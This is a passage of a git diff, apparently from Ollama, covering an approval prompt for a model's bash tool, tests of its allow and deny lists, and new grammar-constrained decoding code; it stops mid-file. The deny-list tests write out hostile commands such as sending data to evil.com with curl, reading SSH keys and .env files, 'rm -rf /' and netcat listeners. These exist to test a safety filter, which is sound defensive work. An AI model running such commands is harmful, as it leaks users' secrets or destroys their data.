||||
|
||||
// Draw options
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option with input
|
||||
if i == 2 {
|
||||
denyLabel := "3. Deny: "
|
||||
// Show placeholder if empty, actual input if typing
|
||||
inputDisplay := state.denyReason
|
||||
if inputDisplay == "" {
|
||||
inputDisplay = "\033[90m(optional reason)\033[0m"
|
||||
@@ -941,7 +820,6 @@ func renderSelectorBox(state *selectorState) {
|
||||
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
|
||||
}
|
||||
} else {
|
||||
// Show allowlist info beside "Allow for this session" (index 1)
|
||||
displayLabel := label
|
||||
if i == 1 && state.allowlistInfo != "" {
|
||||
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
|
||||
@@ -977,9 +855,8 @@ func updateSelectorOptions(state *selectorState) {
|
||||
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
|
||||
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||
|
||||
// Redraw options
|
||||
for i, label := range optionLabels {
|
||||
if i == 2 { // Deny option
|
||||
if i == 2 {
|
||||
denyLabel := "3. Deny: "
|
||||
inputDisplay := state.denyReason
|
||||
if inputDisplay == "" {
|
||||
@@ -991,7 +868,6 @@ func updateSelectorOptions(state *selectorState) {
|
||||
fmt.Fprintf(os.Stderr, " \033[37m%s\033[0m%s\033[K\r\n", denyLabel, inputDisplay)
|
||||
}
|
||||
} else {
|
||||
// Show allowlist info beside "Allow for this session" (index 1)
|
||||
displayLabel := label
|
||||
if i == 1 && state.allowlistInfo != "" {
|
||||
displayLabel = fmt.Sprintf("%s \033[90m%s\033[0m", label, state.allowlistInfo)
|
||||
@@ -1113,11 +989,11 @@ func FormatApprovalResult(toolName string, args map[string]any, result ApprovalR
|
||||
|
||||
switch result.Decision {
|
||||
case ApprovalOnce:
|
||||
label = "approved"
|
||||
label = "Approved"
|
||||
case ApprovalAlways:
|
||||
label = "always allowed"
|
||||
label = "Always allowed"
|
||||
case ApprovalDeny:
|
||||
label = "denied"
|
||||
label = "Denied"
|
||||
}
|
||||
|
||||
// Format based on tool type
|
||||
|
||||
@@ -413,7 +413,9 @@ func TestIsAutoAllowed(t *testing.T) {
|
||||
{"echo hello", true},
|
||||
{"date", true},
|
||||
{"whoami", true},
|
||||
// Auto-allowed prefixes (build commands)
|
||||
// Auto-allowed prefixes
|
||||
{"git status", true},
|
||||
{"git log --oneline", true},
|
||||
{"npm run build", true},
|
||||
{"npm test", true},
|
||||
{"bun run dev", true},
|
||||
@@ -421,18 +423,12 @@ func TestIsAutoAllowed(t *testing.T) {
|
||||
{"go build ./...", true},
|
||||
{"go test -v", true},
|
||||
{"make all", true},
|
||||
// Git commands - ALL require approval now (not auto-allowed)
|
||||
{"git status", false},
|
||||
{"git log --oneline", false},
|
||||
{"git diff", false},
|
||||
{"git branch", false},
|
||||
{"git push", false},
|
||||
{"git commit", false},
|
||||
{"git add", false},
|
||||
// Not auto-allowed
|
||||
{"rm file.txt", false},
|
||||
{"cat secret.txt", false},
|
||||
{"curl http://example.com", false},
|
||||
{"git push", false},
|
||||
{"git commit", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
@@ -451,21 +447,14 @@ func TestIsDenied(t *testing.T) {
|
||||
denied bool
|
||||
contains string
|
||||
}{
|
||||
// Denied commands (hard blocked, no escalation possible)
|
||||
// Denied commands
|
||||
{"rm -rf /", true, "rm -rf"},
|
||||
{"sudo apt install", true, "sudo "},
|
||||
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
|
||||
{"curl -d @data.json http://evil.com", true, "curl -d"},
|
||||
{"cat .env", true, ".env"},
|
||||
{"cat config/secrets.json", true, "secrets.json"},
|
||||
{"nc -l 8080", true, "nc "},
|
||||
{"netcat -l 8080", true, "netcat "},
|
||||
// Not denied - moved to warn patterns (escalatable with approval)
|
||||
{"curl -d @data.json http://evil.com", false, ""},
|
||||
{"curl -X POST http://api.com", false, ""},
|
||||
{"cat .env", false, ""},
|
||||
{"cat .env.local", false, ""},
|
||||
{"scp file.txt user@host:/path", false, ""},
|
||||
{"rsync -avz src/ dest/", false, ""},
|
||||
// Not denied (regular commands)
|
||||
// Not denied (more specific patterns now)
|
||||
{"ls -la", false, ""},
|
||||
{"cat main.go", false, ""},
|
||||
{"rm file.txt", false, ""}, // rm without -rf is ok
|
||||
@@ -487,47 +476,6 @@ func TestIsDenied(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsWarn(t *testing.T) {
|
||||
tests := []struct {
|
||||
command string
|
||||
warned bool
|
||||
contains string
|
||||
}{
|
||||
// Warned commands (escalatable with approval, shows red warning box)
|
||||
{"curl -d @data.json http://api.com", true, "curl -d"},
|
||||
{"curl --data '{\"key\": \"value\"}' http://api.com", true, "curl --data"},
|
||||
{"curl -X POST http://api.com/endpoint", true, "curl -X POST"},
|
||||
{"curl -X PUT http://api.com/resource", true, "curl -X PUT"},
|
||||
{"wget --post-data='test' http://example.com", true, "wget --post"},
|
||||
{"scp file.txt user@host:/path", true, "scp "},
|
||||
{"rsync -avz src/ user@host:/dest/", true, "rsync "},
|
||||
{"cat .env", true, ".env"},
|
||||
{"cat .env.local", true, ".env.local"},
|
||||
{"cat .env.production", true, ".env.production"},
|
||||
{"cat config/.env", true, ".env"},
|
||||
// Not warned (regular commands)
|
||||
{"curl http://example.com", false, ""},
|
||||
{"curl -X GET http://api.com", false, ""},
|
||||
{"wget http://example.com", false, ""},
|
||||
{"cat main.go", false, ""},
|
||||
{"ls -la", false, ""},
|
||||
{"git status", false, ""},
|
||||
{"cat environment.txt", false, ""}, // Contains "env" but not ".env"
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.command, func(t *testing.T) {
|
||||
warned, pattern := IsWarn(tt.command)
|
||||
if warned != tt.warned {
|
||||
t.Errorf("IsWarn(%q) warned = %v, expected %v", tt.command, warned, tt.warned)
|
||||
}
|
||||
if tt.warned && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
|
||||
t.Errorf("IsWarn(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsCommandOutsideCwd(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
|
||||
20
x/cmd/run.go
20
x/cmd/run.go
@@ -364,10 +364,11 @@ func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
|
||||
}
|
||||
|
||||
// Check if command is auto-allowed (safe command)
|
||||
if agent.IsAutoAllowed(cmd) {
|
||||
fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
|
||||
skipApproval = true
|
||||
}
|
||||
// TODO(parthsareen): re-enable with tighter scoped allowlist
|
||||
// if agent.IsAutoAllowed(cmd) {
|
||||
// fmt.Fprintf(os.Stderr, "\033[1mauto-allowed:\033[0m %s\n", formatToolShort(toolName, args))
|
||||
// skipApproval = true
|
||||
// }
|
||||
}
|
||||
}
|
||||
|
||||
@@ -658,14 +659,17 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
|
||||
var toolRegistry *tools.Registry
|
||||
if supportsTools {
|
||||
toolRegistry = tools.DefaultRegistry()
|
||||
if toolRegistry.Count() > 0 {
|
||||
fmt.Fprintf(os.Stderr, "\033[90mtools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
|
||||
|
||||
if toolRegistry.Has("bash") {
|
||||
fmt.Fprintln(os.Stderr)
|
||||
fmt.Fprintln(os.Stderr, "This experimental version of Ollama has the \033[1mbash\033[0m tool enabled.")
|
||||
fmt.Fprintln(os.Stderr, "Models can read files on your computer, or run commands (after you allow them).")
|
||||
fmt.Fprintln(os.Stderr)
|
||||
}
|
||||
|
||||
if yoloMode {
|
||||
fmt.Fprintf(os.Stderr, "\033[1mwarning:\033[0m yolo mode - all tool approvals will be skipped\n")
|
||||
}
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[1mnote:\033[0m model does not support tools - running in chat-only mode\n")
|
||||
}
|
||||
|
||||
// Create approval manager for session
|
||||
|
||||
185
x/grammar/README.md
Normal file
185
x/grammar/README.md
Normal file
@@ -0,0 +1,185 @@
|
||||
# grammar
|
||||
|
||||
Grammar-constrained decoding for LLM outputs using MLX.
|
||||
|
||||
## Performance
|
||||
|
||||
Performance depends on hardware, vocabulary size, grammar, and whether you
|
||||
evaluate the MLX graph. See [Benchmarks](#benchmarks) for how to measure on your
|
||||
setup.
|
||||
|
||||
### Design choices that keep masking fast
|
||||
|
||||
| Technique | Impact |
|
||||
|-----------|--------|
|
||||
| Precomputed token analysis | Terminal matches computed once at startup |
|
||||
| Mask caching by grammar state signature | Reuse masks for repeated parser states |
|
||||
| Partitioned tokens | Exact matches separated from DP candidates |
|
||||
|
||||
### Comparison Notes
|
||||
|
||||
- **llama.cpp**: Decodes each token to UTF-8, checks against PDA. No caching.
|
||||
- **Outlines**: FSM-based. Compilation can take 40s-10min for complex schemas. Fast after compile.
|
||||
- **XGrammar**: PDA with 99% context-independent tokens precomputed. State-of-the-art before this.
|
||||
- **x/grammar**: Precomputed token analysis + mask caching by grammar state signature.
|
||||
|
||||
## Usage
|
||||
|
||||
```go
|
||||
import (
|
||||
"github.com/ollama/ollama/x/grammar"
|
||||
"github.com/ollama/ollama/x/grammar/schema"
|
||||
)
|
||||
|
||||
// Use built-in JSON grammar
|
||||
g, _ := grammar.JSONGrammar()
|
||||
|
||||
// Or from JSON Schema (OpenAI-compatible)
|
||||
g, _ := schema.Grammar(`{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"age": {"type": "integer"}
|
||||
},
|
||||
"required": ["name", "age"]
|
||||
}`)
|
||||
|
||||
// Or parse custom EBNF
|
||||
g, _ := grammar.ParseEBNF(myGrammar, "root")
|
||||
|
||||
// Create engine with model vocabulary
|
||||
engine, _ := grammar.NewEngine(g, vocab)
|
||||
defer engine.Close()
|
||||
|
||||
// Generation loop
|
||||
for !engine.IsComplete() {
|
||||
logits := model.Forward(tokens)
|
||||
masked := engine.ApplyMask(logits) // Invalid tokens → -inf
|
||||
nextToken := sample(masked)
|
||||
engine.Accept(nextToken)
|
||||
}
|
||||
// Output conforms to the grammar when you only sample from masked tokens and call Accept
|
||||
```
|
||||
|
||||
## EBNF Syntax
|
||||
|
||||
```ebnf
|
||||
rule = expression . # Rule definition (ends with .)
|
||||
"literal" # Literal string
|
||||
"a" … "z" # Character range (inclusive)
|
||||
( a | b ) # Grouping with alternation
|
||||
[ optional ] # Optional (0 or 1)
|
||||
{ repeated } # Repetition (0 or more)
|
||||
```
|
||||
|
||||
### Example: JSON Grammar
|
||||
|
||||
```ebnf
|
||||
json = value .
|
||||
|
||||
value = object | array | string | number | "true" | "false" | "null" .
|
||||
|
||||
object = "{" ws "}" | "{" members "}" .
|
||||
members = member { "," member } .
|
||||
member = ws string ws ":" element .
|
||||
|
||||
array = "[" ws "]" | "[" elements "]" .
|
||||
elements = element { "," element } .
|
||||
element = ws value ws .
|
||||
|
||||
string = "\"" { character } "\"" .
|
||||
character = unescaped | escaped .
|
||||
unescaped = " " | "!" | "#" … "[" | "]" … "~" .
|
||||
escaped = "\\" ( "\"" | "\\" | "/" | "b" | "f" | "n" | "r" | "t" ) .
|
||||
|
||||
number = [ "-" ] integer [ fraction ] [ exponent ] .
|
||||
integer = "0" | onenine { digit } .
|
||||
fraction = "." digit { digit } .
|
||||
exponent = ( "e" | "E" ) [ "+" | "-" ] digit { digit } .
|
||||
digit = "0" … "9" .
|
||||
onenine = "1" … "9" .
|
||||
|
||||
ws = { " " | "\t" | "\n" | "\r" } .
|
||||
```
|
||||
|
||||
### Example: Custom Schema
|
||||
|
||||
```ebnf
|
||||
root = "{" ws name_field "," ws age_field ws "}" .
|
||||
|
||||
name_field = "\"name\"" ws ":" ws string .
|
||||
age_field = "\"age\"" ws ":" ws number .
|
||||
|
||||
string = "\"" { char } "\"" .
|
||||
char = " " | "!" | "#" … "~" .
|
||||
|
||||
number = [ "-" ] digit { digit } .
|
||||
digit = "0" … "9" .
|
||||
|
||||
ws = { " " | "\n" } .
|
||||
```
|
||||
|
||||
## JSON Schema Support
|
||||
|
||||
OpenAI-compatible JSON Schema support with automatic EBNF generation:
|
||||
|
||||
```go
|
||||
schema := `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"user": {"$ref": "#/$defs/User"}
|
||||
},
|
||||
"required": ["user"],
|
||||
"$defs": {
|
||||
"User": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"email": {"type": "string", "format": "email"},
|
||||
"role": {"enum": ["admin", "user", "guest"]}
|
||||
},
|
||||
"required": ["name", "email", "role"]
|
||||
}
|
||||
}
|
||||
}`
|
||||
|
||||
grammar, _ := schema.Grammar(schema)
|
||||
```
|
||||
|
||||
### Supported Features
|
||||
|
||||
| Feature | Example |
|
||||
|---------|---------|
|
||||
| Basic types | `string`, `integer`, `number`, `boolean`, `null` |
|
||||
| Objects | `properties`, `required` |
|
||||
| Arrays | `items`, `minItems`, `maxItems` |
|
||||
| Enums | `enum: ["a", "b", "c"]` |
|
||||
| Constants | `const: "value"` |
|
||||
| Union types | `anyOf`, `oneOf`, `type: ["string", "null"]` |
|
||||
| References | `$ref: "#/$defs/Name"`, `$defs` |
|
||||
| Formats | `date`, `time`, `date-time`, `email`, `uuid`, `ipv4` |
|
||||
|
||||
## Benchmarks
|
||||
|
||||
```bash
|
||||
# Run all tests
|
||||
go test -tags mlx ./x/grammar/...
|
||||
|
||||
# Run benchmarks
|
||||
go test -tags mlx ./x/grammar/ -bench=.
|
||||
|
||||
# Compare with llama.cpp (outputs JSON)
|
||||
go run -tags mlx ./x/grammar/cmd/compare -vocab-size 128000 -iterations 500
|
||||
|
||||
# Compare with a more complex schema
|
||||
go run -tags mlx ./x/grammar/cmd/compare \
|
||||
-gbnf x/grammar/cmd/compare/complex.gbnf \
|
||||
-schema x/grammar/cmd/compare/complex.schema.json \
|
||||
-vocab-size 128000 -iterations 500
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [XGrammar Paper](https://arxiv.org/abs/2411.15100) - Flexible and Efficient Structured Generation
|
||||
- [Outlines](https://github.com/dottxt-ai/outlines) - Structured Text Generation
|
||||
- [JSONSchemaBench](https://arxiv.org/abs/2501.10868) - Benchmark for Structured Outputs
|
||||
161
x/grammar/analyzer.go
Normal file
161
x/grammar/analyzer.go
Normal file
@@ -0,0 +1,161 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
// terminalTokenGroups contains pre-partitioned tokens for a terminal.
|
||||
// This enables O(1) lookup of tokens that exactly match vs need DP validation.
|
||||
type terminalTokenGroups struct {
|
||||
// ExactMatches are tokens that exactly match this terminal (O(1) validation)
|
||||
ExactMatches []int32
|
||||
|
||||
// DPCandidates are tokens that start with this terminal but need DP validation
|
||||
DPCandidates []int
|
||||
}
|
||||
|
||||
// tokenAnalysis contains precomputed terminal matches for a token
|
||||
type tokenAnalysis struct {
|
||||
// The token string
|
||||
Token string
|
||||
|
||||
// TokenID in the vocabulary
|
||||
TokenID int
|
||||
|
||||
// Matches at each byte position
|
||||
// MatchesAtPos[i] = terminals matching at position i with their lengths
|
||||
MatchesAtPos [][]terminalMatch
|
||||
|
||||
// Fast path: if token exactly matches one terminal
|
||||
// -1 if no exact match
|
||||
exactMatch int
|
||||
|
||||
// Whether this token can be consumed at all (has at least one match)
|
||||
HasMatches bool
|
||||
}
|
||||
|
||||
// analyzer precomputes terminal matches for a vocabulary
|
||||
type analyzer struct {
|
||||
matcher *terminalMatcher
|
||||
analyses []tokenAnalysis // Indexed by token ID
|
||||
vocab []string
|
||||
|
||||
// Pre-partitioned tokens by terminal (exact match vs DP candidates)
|
||||
// This enables direct slice appends instead of per-token branching
|
||||
tokensByTerminal []terminalTokenGroups
|
||||
}
|
||||
|
||||
// newAnalyzer creates an analyzer for the given vocabulary and terminals
|
||||
func newAnalyzer(vocab []string, matcher *terminalMatcher) *analyzer {
|
||||
a := &analyzer{
|
||||
matcher: matcher,
|
||||
analyses: make([]tokenAnalysis, len(vocab)),
|
||||
vocab: vocab,
|
||||
}
|
||||
|
||||
// Precompute analysis for each token
|
||||
for i, token := range vocab {
|
||||
a.analyses[i] = a.analyze(token, i)
|
||||
}
|
||||
|
||||
// Build pre-partitioned token groups for fast ApplyMask
|
||||
a.buildTokenPartitions()
|
||||
|
||||
return a
|
||||
}
|
||||
|
||||
// analyze computes terminal matches for a single token
|
||||
func (a *analyzer) analyze(token string, tokenID int) tokenAnalysis {
|
||||
analysis := tokenAnalysis{
|
||||
Token: token,
|
||||
TokenID: tokenID,
|
||||
MatchesAtPos: make([][]terminalMatch, len(token)),
|
||||
exactMatch: -1,
|
||||
HasMatches: false,
|
||||
}
|
||||
|
||||
if len(token) == 0 {
|
||||
return analysis
|
||||
}
|
||||
|
||||
// Compute matches at each position
|
||||
data := []byte(token)
|
||||
for pos := 0; pos < len(data); pos++ {
|
||||
matches := a.matcher.matchesAt(data, pos)
|
||||
analysis.MatchesAtPos[pos] = matches
|
||||
if len(matches) > 0 {
|
||||
analysis.HasMatches = true
|
||||
}
|
||||
}
|
||||
|
||||
// Exact match is only valid when a single terminal spans the entire token
|
||||
if len(analysis.MatchesAtPos) > 0 {
|
||||
var exactID int = -1
|
||||
for _, match := range analysis.MatchesAtPos[0] {
|
||||
if match.Length != len(token) {
|
||||
continue
|
||||
}
|
||||
if exactID >= 0 && exactID != match.TerminalID {
|
||||
exactID = -1
|
||||
break
|
||||
}
|
||||
exactID = match.TerminalID
|
||||
}
|
||||
analysis.exactMatch = exactID
|
||||
}
|
||||
|
||||
return analysis
|
||||
}
|
||||
|
||||
// analysis returns the precomputed analysis for a token ID
|
||||
func (a *analyzer) analysis(tokenID int) tokenAnalysis {
|
||||
if tokenID < 0 || tokenID >= len(a.analyses) {
|
||||
return tokenAnalysis{exactMatch: -1}
|
||||
}
|
||||
return a.analyses[tokenID]
|
||||
}
|
||||
|
||||
// vocabSize returns the vocabulary size
|
||||
func (a *analyzer) vocabSize() int {
|
||||
return len(a.vocab)
|
||||
}
|
||||
|
||||
// buildTokenPartitions pre-partitions tokens into exact-match vs needs-DP groups per terminal.
|
||||
// This enables ApplyMask to use direct slice appends instead of per-token branching.
|
||||
func (a *analyzer) buildTokenPartitions() {
|
||||
numTerminals := a.matcher.terminalCount()
|
||||
a.tokensByTerminal = make([]terminalTokenGroups, numTerminals)
|
||||
|
||||
for tokenID, analysis := range a.analyses {
|
||||
if !analysis.HasMatches {
|
||||
continue
|
||||
}
|
||||
|
||||
if analysis.exactMatch >= 0 {
|
||||
// Token exactly matches one terminal - fast path (O(1) validation)
|
||||
tid := analysis.exactMatch
|
||||
a.tokensByTerminal[tid].ExactMatches = append(
|
||||
a.tokensByTerminal[tid].ExactMatches, int32(tokenID))
|
||||
} else {
|
||||
// Token needs DP validation - add to all terminals it can start with
|
||||
// This way, when a terminal is valid, we know exactly which tokens need DP
|
||||
if len(analysis.MatchesAtPos) > 0 {
|
||||
seen := make(map[int]bool)
|
||||
for _, match := range analysis.MatchesAtPos[0] {
|
||||
tid := match.TerminalID
|
||||
if !seen[tid] {
|
||||
seen[tid] = true
|
||||
a.tokensByTerminal[tid].DPCandidates = append(
|
||||
a.tokensByTerminal[tid].DPCandidates, tokenID)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// terminalGroups returns the pre-partitioned token groups for a terminal ID
|
||||
func (a *analyzer) terminalGroups(terminalID int) terminalTokenGroups {
|
||||
if terminalID < 0 || terminalID >= len(a.tokensByTerminal) {
|
||||
return terminalTokenGroups{}
|
||||
}
|
||||
return a.tokensByTerminal[terminalID]
|
||||
}
|
||||
648
x/grammar/bridge.go
Normal file
648
x/grammar/bridge.go
Normal file
@@ -0,0 +1,648 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import (
|
||||
"encoding/binary"
|
||||
"hash/fnv"
|
||||
"sort"
|
||||
"sync"
|
||||
)
|
||||
|
||||
// visitedMapPool reduces allocations for visited maps in bridge operations
|
||||
var visitedMapPool = sync.Pool{
|
||||
New: func() interface{} {
|
||||
return make(map[stateStackKey]bool, 16)
|
||||
},
|
||||
}
|
||||
|
||||
// getVisitedMap gets a map from the pool
|
||||
func getVisitedMap() map[stateStackKey]bool {
|
||||
return visitedMapPool.Get().(map[stateStackKey]bool)
|
||||
}
|
||||
|
||||
// putVisitedMap returns a map to the pool after clearing it
|
||||
func putVisitedMap(m map[stateStackKey]bool) {
|
||||
for k := range m {
|
||||
delete(m, k)
|
||||
}
|
||||
visitedMapPool.Put(m)
|
||||
}
|
||||
|
||||
// parserConfig represents a pda state+stack combination
|
||||
type parserConfig struct {
|
||||
state state
|
||||
Stack []stackSymbol
|
||||
}
|
||||
|
||||
// clone creates a deep copy of the config
|
||||
func (c *parserConfig) clone() *parserConfig {
|
||||
newStack := make([]stackSymbol, len(c.Stack))
|
||||
copy(newStack, c.Stack)
|
||||
return &parserConfig{
|
||||
state: c.state,
|
||||
Stack: newStack,
|
||||
}
|
||||
}
|
||||
|
||||
// key returns a unique key for this config for deduplication
|
||||
func (c *parserConfig) key() uint64 {
|
||||
h := fnv.New64a()
|
||||
var buf [8]byte
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(c.state))
|
||||
h.Write(buf[:])
|
||||
for _, sym := range c.Stack {
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(sym))
|
||||
h.Write(buf[:])
|
||||
}
|
||||
return h.Sum64()
|
||||
}
|
||||
|
||||
// configSet represents a set of parser configurations (for nondeterminism)
|
||||
type configSet struct {
|
||||
configs []*parserConfig
|
||||
normalized bool // true if already deduplicated and sorted
|
||||
cachedSig uint64 // cached signature after normalization
|
||||
}
|
||||
|
||||
// newConfigSet creates a new config set with a single configuration
|
||||
func newConfigSet(state state, stack []stackSymbol) *configSet {
|
||||
return &configSet{
|
||||
configs: []*parserConfig{
|
||||
{state: state, Stack: stack},
|
||||
},
|
||||
normalized: true, // single config is already normalized
|
||||
}
|
||||
}
|
||||
|
||||
// normalize deduplicates and sorts configs for stable signatures
|
||||
func (c *configSet) normalize() {
|
||||
if c.normalized || len(c.configs) <= 1 {
|
||||
c.normalized = true
|
||||
return
|
||||
}
|
||||
|
||||
// Deduplicate using a map
|
||||
seen := make(map[uint64]*parserConfig, len(c.configs))
|
||||
for _, cfg := range c.configs {
|
||||
key := cfg.key()
|
||||
if _, exists := seen[key]; !exists {
|
||||
seen[key] = cfg
|
||||
}
|
||||
}
|
||||
|
||||
// Extract unique configs
|
||||
unique := make([]*parserConfig, 0, len(seen))
|
||||
for _, cfg := range seen {
|
||||
unique = append(unique, cfg)
|
||||
}
|
||||
|
||||
// Sort by key for deterministic ordering
|
||||
sort.Slice(unique, func(i, j int) bool {
|
||||
return unique[i].key() < unique[j].key()
|
||||
})
|
||||
|
||||
c.configs = unique
|
||||
c.normalized = true
|
||||
}
|
||||
|
||||
// signature returns a hash for cache lookup (normalizes first)
|
||||
func (c *configSet) signature() uint64 {
|
||||
c.normalize()
|
||||
|
||||
// Return cached signature if available
|
||||
if c.cachedSig != 0 {
|
||||
return c.cachedSig
|
||||
}
|
||||
|
||||
h := fnv.New64a()
|
||||
|
||||
// Hash number of configs
|
||||
var buf [8]byte
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(len(c.configs)))
|
||||
h.Write(buf[:])
|
||||
|
||||
// Hash each config (already sorted)
|
||||
for _, cfg := range c.configs {
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(cfg.state))
|
||||
h.Write(buf[:])
|
||||
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(len(cfg.Stack)))
|
||||
h.Write(buf[:])
|
||||
|
||||
for _, sym := range cfg.Stack {
|
||||
binary.LittleEndian.PutUint64(buf[:], uint64(sym))
|
||||
h.Write(buf[:])
|
||||
}
|
||||
}
|
||||
|
||||
c.cachedSig = h.Sum64()
|
||||
return c.cachedSig
|
||||
}
|
||||
|
||||
// isEmpty returns true if there are no configurations
|
||||
func (c *configSet) isEmpty() bool {
|
||||
return len(c.configs) == 0
|
||||
}
|
||||
|
||||
// clone creates a deep copy of the config set
|
||||
func (c *configSet) clone() *configSet {
|
||||
newConfigs := make([]*parserConfig, len(c.configs))
|
||||
for i, cfg := range c.configs {
|
||||
newConfigs[i] = cfg.clone()
|
||||
}
|
||||
return &configSet{configs: newConfigs}
|
||||
}
|
||||
|
||||
// bridge connects token analysis to pda validation
|
||||
type bridge struct {
|
||||
pda *pda
|
||||
analyzer *analyzer
|
||||
}
|
||||
|
||||
// newBridge creates a new bridge
|
||||
func newBridge(pda *pda, analyzer *analyzer) *bridge {
|
||||
return &bridge{
|
||||
pda: pda,
|
||||
analyzer: analyzer,
|
||||
}
|
||||
}
|
||||
|
||||
// IsTokenValid checks if token T can be consumed from the current config
|
||||
// This is the main entry point for token validation
|
||||
func (b *bridge) IsTokenValid(tokenID int, config *configSet) bool {
|
||||
analysis := b.analyzer.analysis(tokenID)
|
||||
|
||||
if !analysis.HasMatches {
|
||||
return false
|
||||
}
|
||||
|
||||
// Fast path: exact terminal match
|
||||
if analysis.exactMatch >= 0 {
|
||||
terminal := b.analyzer.matcher.terminals[analysis.exactMatch]
|
||||
return b.canAcceptTerminal(config, terminal.Pattern)
|
||||
}
|
||||
|
||||
// General path: DP over (pos, config)
|
||||
return b.dpValidate(&analysis, config)
|
||||
}
|
||||
|
||||
// canAcceptTerminal checks if any config can accept the terminal
|
||||
func (b *bridge) canAcceptTerminal(config *configSet, pattern string) bool {
|
||||
for _, cfg := range config.configs {
|
||||
if b.canConfigAcceptTerminal(cfg, pattern) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// canConfigAcceptTerminal checks if a single config can accept the terminal
|
||||
func (b *bridge) canConfigAcceptTerminal(cfg *parserConfig, pattern string) bool {
|
||||
// Use pooled visited map to reduce allocations
|
||||
visited := getVisitedMap()
|
||||
result := b.tryAcceptTerminal(cfg.state, cfg.Stack, pattern, visited)
|
||||
putVisitedMap(visited)
|
||||
return result
|
||||
}
|
||||
|
||||
// tryAcceptTerminal recursively tries to accept a terminal from a state
|
||||
func (b *bridge) tryAcceptTerminal(state state, stack []stackSymbol, pattern string, visited map[stateStackKey]bool) bool {
|
||||
key := stateStackKey{state: state, stackSig: stackSignature(stack)}
|
||||
if visited[key] {
|
||||
return false
|
||||
}
|
||||
visited[key] = true
|
||||
|
||||
stackTop := stackEmpty
|
||||
if len(stack) > 0 {
|
||||
stackTop = stack[len(stack)-1]
|
||||
}
|
||||
|
||||
for _, t := range b.pda.Transitions[state] {
|
||||
// Check stack constraint
|
||||
if t.stackTop != stackEmpty && t.stackTop != stackTop {
|
||||
continue
|
||||
}
|
||||
|
||||
// Can't pop more than we have
|
||||
if t.StackPop > len(stack) {
|
||||
continue
|
||||
}
|
||||
|
||||
if t.Pattern == pattern {
|
||||
// Direct match
|
||||
return true
|
||||
}
|
||||
|
||||
if t.Pattern == "" {
|
||||
// Epsilon transition - follow it
|
||||
newStack := make([]stackSymbol, len(stack))
|
||||
copy(newStack, stack)
|
||||
|
||||
// Pop
|
||||
if t.StackPop > 0 {
|
||||
newStack = newStack[:len(newStack)-t.StackPop]
|
||||
}
|
||||
|
||||
// Push
|
||||
newStack = append(newStack, t.StackPush...)
|
||||
|
||||
if b.tryAcceptTerminal(t.ToState, newStack, pattern, visited) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// dpValidate runs DP for multi-terminal tokens
|
||||
func (b *bridge) dpValidate(analysis *tokenAnalysis, startConfig *configSet) bool {
|
||||
// state: (pos, configSet)
|
||||
// Memoize by (pos, configSig)
|
||||
type dpKey struct {
|
||||
pos int
|
||||
sig uint64
|
||||
}
|
||||
memo := make(map[dpKey]bool)
|
||||
|
||||
var dp func(pos int, config *configSet) bool
|
||||
dp = func(pos int, config *configSet) bool {
|
||||
if pos == len(analysis.Token) {
|
||||
return true // Consumed entire token
|
||||
}
|
||||
|
||||
if config.isEmpty() {
|
||||
return false
|
||||
}
|
||||
|
||||
key := dpKey{pos, config.signature()}
|
||||
if result, ok := memo[key]; ok {
|
||||
return result
|
||||
}
|
||||
|
||||
// Try each terminal that matches at this position
|
||||
for _, match := range analysis.MatchesAtPos[pos] {
|
||||
terminal := b.analyzer.matcher.terminals[match.TerminalID]
|
||||
newConfig := b.advanceConfig(config, terminal.Pattern)
|
||||
if newConfig != nil && !newConfig.isEmpty() && dp(pos+match.Length, newConfig) {
|
||||
memo[key] = true
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
memo[key] = false
|
||||
return false
|
||||
}
|
||||
|
||||
return dp(0, startConfig)
|
||||
}
|
||||
|
||||
// advanceConfig advances all configs that can accept the terminal
|
||||
func (b *bridge) advanceConfig(config *configSet, pattern string) *configSet {
|
||||
var newConfigs []*parserConfig
|
||||
|
||||
for _, cfg := range config.configs {
|
||||
advanced := b.advanceSingleConfig(cfg, pattern)
|
||||
newConfigs = append(newConfigs, advanced...)
|
||||
}
|
||||
|
||||
if len(newConfigs) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
return &configSet{configs: newConfigs}
|
||||
}
|
||||
|
||||
// advanceSingleConfig advances a single config by accepting a terminal
|
||||
